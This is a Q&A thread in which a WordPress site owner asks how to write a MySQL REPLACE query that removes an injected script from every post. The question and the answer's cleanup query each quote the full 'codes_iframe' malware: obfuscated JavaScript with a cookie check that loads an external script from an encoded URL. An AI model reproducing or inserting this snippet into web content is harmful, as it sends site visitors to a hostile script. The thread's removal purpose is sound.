# how can i write javascript code in a mysql query?

Tags: javascript, mysql, sql, wordpress, phpmyadmin

i write this query in phpmyadmin but show me error.
How should I write the correct query?

```
UPDATE `wp_posts` SET post_content = 
REPLACE (post_content, '<!--codes_iframe-->
<script type="text/javascript"> function getCookie(e)
{var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace
(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));
return U?decodeURIComponent(U[1]):void 0}
var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs="
,now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");
if(now>=(time=cookie)||void 0===time)
{var time=Math.floor(Date.now()/1e3+86400),
date=new Date((new Date).getTime()+86400);
document.cookie="redirect="+time+"; 
path=/; expires="+date.toGMTString(),
```

document.write('</script>')} ', ' ')

Comment: You do not want this... See sql injection. And probably many other security issues :(

Comment: Also, since your setting a cookie, you probably should do it trough PHP. Then do the same you do in Javascript but now in php. And use the value inside a prepared statement. If you really have to do it trough Javascript. You should pass the data you want to write in your query to PHP with something like AJAX.

Comment: If the error is showing as a red circle and/or X on the SQL tab, you can hover over that for more information. If you've submitted the query, you should get an error message back from MySQL. In either case, it would be helpful for you to post the full error message.

Answer (score 0):

As far I see you want to remove that js code from all your posts. Looks like that js code is loading an external script. In order to remove it you need to escape the `'` char. So instead of `...,document.write('<script src="'+src+'"><\/script>')} </script>...` you need to use `...,document.write(\'<script src="\'+src+\'"><\/script>\')} </script>...`.

Before running the query make sure to do a backup on that table. The correct query is:

```
UPDATE `wp_posts` 
SET post_content = REPLACE (post_content, '<!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write(\'<script src="\'+src+\'"><\/script>\')} </script><!--/codes_iframe-->', ' ')
;
```

Comment: I tried this query but return 0 rows affected